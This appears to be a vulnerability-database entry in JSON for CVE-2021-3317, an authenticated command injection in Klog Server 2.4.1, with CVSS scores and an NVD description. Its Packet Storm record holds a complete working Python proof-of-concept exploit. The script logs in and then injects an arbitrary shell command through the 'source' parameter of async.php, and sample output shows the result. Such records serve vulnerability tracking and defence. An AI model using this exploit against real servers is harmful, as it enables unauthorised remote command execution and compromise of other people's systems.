DATABASE RESOURCES PRICING ABOUT US

{"id": "AB51FBB4-EC48-5C23-AFC4-FB827CF1843C", "vendorId": null, "type": "githubexploit", "bulletinFamily": "exploit", "title": "Exploit for Command Injection in Klogserver Klog Server", "description": "## Information\r\nExploit Title: Klog Server 2.4.1 - Command Injec...", "published": "2021-04-09T07:36:46", "modified": "2021-10-24T06:20:59", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "", "reporter": "", "references": [], "cvelist": ["CVE-2021-3317"], "immutableFields": [], "lastseen": "2021-12-10T15:22:17", "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-3317"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:161208"]}], "rev": 4}, "score": {"value": 4.7, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-3317"]}, {"type": "kitploit", "idList": ["KITPLOIT:3449843613571411531"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:161208"]}, {"type": "threatpost", "idList": ["THREATPOST:99DC4B497599503D640FDFD9A2DC5FA3"]}]}, "exploitation": null, "vulnersScore": 4.7}, "_state": {"dependencies": 1646440385}, "privateArea": 1}

{"cve": [{"lastseen": "2022-03-23T18:35:28", "description": "KLog Server through 2.4.1 allows authenticated command injection. async.php calls shell_exec() on the original value of the source parameter.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-26T23:15:00", "type": "cve", "title": "CVE-2021-3317", "cwe": ["CWE-77"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3317"], "modified": "2021-02-01T21:13:00", "cpe": ["cpe:/a:klogserver:klog_server:2.4.1"], "id": "CVE-2021-3317", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3317", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:klogserver:klog_server:2.4.1:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2021-02-01T16:49:13", "description": "", "cvss3": {}, "published": "2021-02-01T00:00:00", "type": "packetstorm", "title": "Klog Server 2.4.1 Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-3317"], "modified": "2021-02-01T00:00:00", "id": "PACKETSTORM:161208", "href": "https://packetstormsecurity.com/files/161208/Klog-Server-2.4.1-Command-Injection.html", "sourceData": "`# Exploit Title: Klog Server 2.4.1 - Command Injection (Authenticated) \n# Date: 26.01.2021 \n# Exploit Author: Metin Yunus Kandemir \n# Vendor Homepage: https://www.klogserver.com/ \n# Version: 2.4.1 \n# Description: https://docs.unsafe-inline.com/0day/klog-server-authenticated-command-injection \n# CVE: 2021-3317 \n \n\"\"\" \nDescription: \n\"source\" parameter is executed via shell_exec() function without input validation in async.php file. \n \nExample: \npython3 PoC.py --target 10.10.56.51 --username admin --password admin --command id \n[*] Status Code for login request: 302 \n[+] Authentication was successful! \n[*] Exploiting... \n \nuid=48(apache) gid=48(apache) groups=48(apache) \n \n\"\"\" \n \nimport argparse \nimport requests \nimport sys \nimport urllib3 \nfrom argparse import ArgumentParser, Namespace \n \n \ndef main(): \ndsc = \"Klog Server 2.4.1 - Command Injection (Authenticated)\" \nparser: ArgumentParser = argparse.ArgumentParser(description=dsc) \nparser.add_argument(\"--target\", help=\"IPv4 address of Cockpit server\", type=str, required=True) \nparser.add_argument(\"--username\", help=\"Username\", type=str, required=True) \nparser.add_argument(\"--password\", help=\"Password\", type=str, required=True) \nparser.add_argument(\"--command\", help=\"Command\", type=str, required=True) \nargs: Namespace = parser.parse_args() \nif args.target: \ntarget = args.target \nif args.username: \nusername = args.username \nif args.password: \npassword = args.password \nif args.command: \ncommand = args.command \n \nexploit(target, username, password, command) \n \n \ndef exploit(target, username, password, command): \nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) \ns = requests.Session() \nheaders = { \n\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\", \n\"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\", \n\"Accept-Language\": \"en-US,en;q=0.5\", \n\"Accept-Encoding\": \"gzip, deflate\", \n\"Content-Type\": \"application/x-www-form-urlencoded\", \n\"Connection\": \"close\", \n\"Upgrade-Insecure-Requests\": \"1\", \n} \n \ndata = {\"user\" : username, \"pswd\" : password} \n \nlogin = s.post(\"https://\" + target + \"/actions/authenticate.php\" , data=data, headers=headers, allow_redirects=False, verify=False) \nprint(\"[*] Status Code for login request: \" + str(login.status_code)) \n \nif login.status_code == 302: \ncheck = s.get(\"https://\" + target + \"/index.php\", allow_redirects=False, verify=False) \nif check.status_code == 200: \nprint(\"[+] Authentication was successful!\") \nelse: \nprint(\"[-] Authentication was unsuccessful!\") \nsys.exit(1) \nelse: \nprint(\"Something went wrong!\") \nsys.exit(1) \n \nprint(\"[*] Exploiting...\\n\") \n \nexecuteCommand = s.get(\"https://\" + target + \"/actions/async.php?action=stream&source=;\"+ command +\";\", allow_redirects=False, verify=False) \nprint(executeCommand.text) \nsys.exit(0) \n \nif __name__ == '__main__': \nmain() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/161208/klogserver241-inject.txt", "cvss": {"score": 0.0, "vector": "NONE"}}]}